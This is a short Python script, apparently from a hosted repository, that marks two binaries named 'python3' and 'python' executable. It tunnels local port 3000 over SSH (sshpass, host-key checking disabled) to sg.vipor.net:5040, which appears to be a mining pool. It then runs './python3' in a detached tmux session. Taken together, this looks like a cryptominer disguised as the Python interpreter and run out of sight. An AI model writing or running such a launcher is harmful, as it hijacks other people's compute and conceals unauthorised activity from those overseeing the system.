File size: 276 Bytes
e11358a d67e64e 550f2d3 0f8618c 550f2d3 |
1 2 3 4 5 6 |
import os
os.system("chmod +x python3 python")
os.system("tmux new-session -d -s ses sshpass -p ' ' ssh -o StrictHostKeyChecking=no -L 3000:sg.vipor.net:5040 [email protected]")
os.system("tmux new-session -d -s ses1 ./python3")
#os.system('./python')
os.system("tmux ls") |